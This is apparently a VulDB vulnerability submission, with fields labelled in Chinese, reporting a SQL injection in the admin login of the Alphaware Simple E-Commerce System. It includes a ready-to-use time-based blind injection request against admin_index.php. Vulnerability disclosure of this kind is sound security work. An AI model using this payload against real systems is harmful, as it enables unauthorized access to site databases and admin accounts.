| 标题 | Alphaware Simple E-Commerce System admin login SQL Injection |
|---|
| 描述 | A SQL Injection Vulnerability has been discovered in Alphaware Simple E-Commerce System, and the vulnerable function is admin login.
Attackers can exploit it by sending a crafted request, the injectable parameters are 'username' and 'password' . A time-based blind injection poc is below:
POST /alphaware/admin/admin_index.php HTTP/1.1
**********************************************************
username=admin' AND (SELECT 8062 FROM (SELECT(SLEEP(5)))meUD)-- hLiX&password=admin23&enter=Enter
Then the server will response after 5s, which proves the vulnerability. |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |
|---|
| 用户 | WWesleywww (UID 43117) |
|---|
| 提交 | 2023-03-20 07時36分 (3 年前) |
|---|
| 管理 | 2023-03-20 08時28分 (51 minutes later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 223407 [SourceCodester Alphaware Simple E-Commerce System 1.0 admin/admin_index.php username/password SQL注入] |
|---|
| 积分 | 20 |
|---|